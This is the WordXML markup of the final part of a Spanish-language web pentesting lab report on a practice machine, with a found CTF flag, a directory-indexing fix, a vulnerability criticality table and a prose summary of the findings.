    <w:p w14:paraId="0401E614" w14:textId="3AA41E62" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57E446BC" w14:textId="4CC0F463" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="center"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B7A8059" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="559ABF4E" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Usamos la ruta que nos dio el escaneo de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> llamada: http://192.168.1.141/cyberacademy/ y nos da la FLAG: FLAG{YEAH_R0B0T$.RUL3$} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA9FF9C" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="240"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10BFC935" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recomendación:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> La indexación de directorios se puede desactivar en la configuración del servidor web (por ejemplo, en Apache con la directiva </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Options</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -Indexes en un archivo .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>htaccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> o en la configuración principal del servidor). También es importante asegurar que todos los archivos sensibles estén protegidos con permisos de acceso adecuados. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2896BF50" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:pict w14:anchorId="13789358">
          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A36175C" w14:textId="1DC45E46" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc200831439"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>4 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Tabla</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> de criticidad</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482B0035" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="240"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34B3DEA6" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc200831440"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>192.168.1.141</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="737167A2" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="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87"/>
        <w:gridCol w:w="2004"/>
      </w:tblGrid>
      <w:tr w:rsidR="00437FF1" w14:paraId="6ED51857" w14:textId="77777777">
        <w:trPr>
          <w:divId w:val="198251480"/>
          <w:trHeight w:val="296"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6002" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="191C24"/>
            <w:noWrap/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="70" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="70" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60A1B02E" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:ind w:left="70" w:right="461"/>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Nombre </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="151" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="191C24"/>
            <w:noWrap/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="70" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="70" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35F0B824" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:ind w:left="284" w:right="461"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Criticidad </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00437FF1" w14:paraId="209C19EB" w14:textId="77777777">
        <w:trPr>
          <w:divId w:val="198251480"/>
          <w:trHeight w:val="296"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6002"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0013A497" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:ind w:left="70" w:right="461"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ejecución remota de código (RCE) </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1411"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0C9DE663" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Muy Alta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00437FF1" w14:paraId="78237A1A" w14:textId="77777777">
        <w:trPr>
          <w:divId w:val="198251480"/>
          <w:trHeight w:val="296"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6002"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1F9B051D" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:ind w:left="70" w:right="461"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Autorización insuficiente </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1411"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191FE867" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Muy Alta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00437FF1" w14:paraId="4EA6B31B" w14:textId="77777777">
        <w:trPr>
          <w:divId w:val="198251480"/>
          <w:trHeight w:val="296"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6002"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04102A9D" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:ind w:left="70" w:right="461"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Exposición de datos sensibles </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1411"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7B3F838D" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Alta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00437FF1" w14:paraId="5330BF7B" w14:textId="77777777">
        <w:trPr>
          <w:divId w:val="198251480"/>
          <w:trHeight w:val="296"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6002"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6C31E873" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:ind w:left="70" w:right="461"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Inyección de comandos </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1411"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51AF7538" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Alta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00437FF1" w14:paraId="606BF054" w14:textId="77777777">
        <w:trPr>
          <w:divId w:val="198251480"/>
          <w:trHeight w:val="296"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6002"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102EBF3B" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:ind w:left="70" w:right="461"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Enumeracion</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> de directorios </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1411"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6C6B0356" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Alta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00437FF1" w14:paraId="1AA9E475" w14:textId="77777777">
        <w:trPr>
          <w:divId w:val="198251480"/>
          <w:trHeight w:val="296"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6002"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27EFAA8C" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:ind w:left="70" w:right="461"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Contaminación de parámetros HTTP (HPP) </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1411"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306E8325" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Alta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00437FF1" w14:paraId="5F23C887" w14:textId="77777777">
        <w:trPr>
          <w:divId w:val="198251480"/>
          <w:trHeight w:val="296"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6002"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02AE10F5" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:ind w:left="70" w:right="461"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Indexacion</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> de Directorios </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1411"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6ACD402C" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Media</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7AD0CD37" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="375D9F95" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc200831441"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Conclusiones</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBFE07C" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6513C837" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:t>Durante el análisis de seguridad realizado en la máquina del proyecto de hacking web, se detectaron varias vulnerabilidades que pueden ser aprovechadas por un atacante para comprometer el sistema. A continuación, se resumen los hallazgos más importantes: Ejecución remota de comandos (RCE): Se logró ejecutar comandos directamente en el servidor, lo que permite tomar el control del sistema si no se corrige. Autorización insuficiente: Algunas funciones o recursos estaban accesibles sin tener los permisos necesarios, lo cual permite a usuarios no autorizados ver o hacer cosas que no deberían. Exposición de datos sensibles: Se encontraron datos importantes (como contraseñas, rutas internas o configuraciones) visibles sin protección adecuada. Inyección de comandos: Fue posible enviar comandos maliciosos a través de formularios o parámetros, y que estos se ejecutaran en el sistema. Indexación de directorios: El servidor permite ver listas de archivos y carpetas, lo cual puede ayudar a un atacante a descubrir información útil. Enumeración de rutas (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>paths</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">): Se identificaron rutas internas o archivos al probar diferentes </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>URLs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, algo que no debería estar tan expuesto. Contaminación de parámetros HTTP: Se pudo modificar o manipular ciertos parámetros en las peticiones web para alterar el comportamiento de la aplicación. Estos hallazgos muestran que la aplicación tiene varias debilidades que podrían ser explotadas. Se recomienda aplicar buenas prácticas de desarrollo seguro, revisar los controles de acceso y validar correctamente todos los datos que entran desde el usuario. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F4D7A6" w14:textId="77777777" w:rsidR="00DC6981" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="cabeceraypie"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00DC698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7DF"/>
    <w:rsid w:val="000D3EC5"/>
    <w:rsid w:val="002C5736"/>
    <w:rsid w:val="00437FF1"/>
    <w:rsid w:val="0064557E"/>
    <w:rsid w:val="006A21C9"/>
    <w:rsid w:val="007F1491"/>
    <w:rsid w:val="00AA35D7"/>
    <w:rsid w:val="00DC6981"/>
    <w:rsid w:val="00FA77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EC74E2"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C66D0AC5-536B-4531-B951-E0F4558D8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Ttulo1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Ttulo1Car"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="36"/>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Ttulo2Car"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Ttulo3Car"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="27"/>
      <w:szCs w:val="27"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Ttulo4Car"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>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u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hipervnculovisitado">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rPr>
      <w:color w:val="954F72"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="msonormal0">
    <w:name w:val="msonormal"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="contenedor">
    <w:name w:val="contenedor"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Textoindependiente">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="TextoindependienteCar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TextoindependienteCar">
    <w:name w:val="Texto independiente Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Textoindependiente"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="tableparagraph">
    <w:name w:val="tableparagraph"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo4Car">
    <w:name w:val="Título 4 Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Ttulo4"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>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Pr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="cabeceraypie">
    <w:name w:val="cabeceraypie"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TtuloTDC">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Ttulo1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="002C5736"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:kern w:val="0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TDC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002C5736"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TDC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002C5736"/>
    <w:pPr>
